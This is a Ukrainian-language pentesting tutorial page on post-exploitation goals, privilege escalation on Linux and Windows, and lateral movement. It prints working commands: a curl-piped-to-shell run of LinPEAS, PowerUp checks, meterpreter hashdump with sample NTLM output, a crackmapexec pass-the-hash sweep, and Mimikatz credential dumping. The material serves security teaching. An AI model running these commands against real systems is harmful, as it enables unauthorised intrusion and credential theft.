📖
Post-Exploitation
Дії після отримання доступу: закріплення, ескалація привілеїв, lateral movement.
Post-Exploitation: цілі
Після отримання першого доступу (initial access) починається post-exploitation:
- Persistence — залишитись після перезавантаження
- Privilege Escalation — підвищити права (user → root/SYSTEM)
- Lateral Movement — переміститись на інші системи
- Data Collection — зібрати цільові дані
- Evidence Removal — очистити сліди (опційно, рідко в пентесті)
Privilege Escalation (Linux)
bash
# Поточний користувач і групи
id
whoami
# SUID binaries (виконуються з правами власника)
find / -perm -4000 2>/dev/null
# Sudo дозволи
sudo -l
# Cron jobs (задачі за розкладом)
cat /etc/crontab
ls /etc/cron.*
# Writeable files owned by root
find / -writable -user root 2>/dev/null
# LinPEAS — автоматичний аналізатор
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shPrivilege Escalation (Windows)
powershell
# Інформація про систему
systeminfo
whoami /priv
# WinPEAS
winpeas.exe
# PowerUp (PowerShell)
Import-Module PowerUp.ps1; Invoke-AllChecks
# AlwaysInstallElevated (MSI з правами SYSTEM)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\InstallerLateral Movement
Переміщення по мережі після отримання першого плацдарму.
Pass the Hash (Windows)
bash
# Витягнути хеші NTLM з пам'яті
meterpreter> hashdump
# administrator:500:aad3b435...:8846f7eaee8fb117ad06bdd830b7586c:::
# Використати хеш без злому (PTH)
crackmapexec smb 192.168.56.0/24 -u administrator -H 8846f7eaee8fb117ad06bdd830b7586cMimikatz (Windows credential harvesting)
privilege::debug
sekurlsa::logonpasswords # паролі з пам'яті
sekurlsa::wdigest # plaintext паролі (старі Windows)
lsadump::sam # SAM база
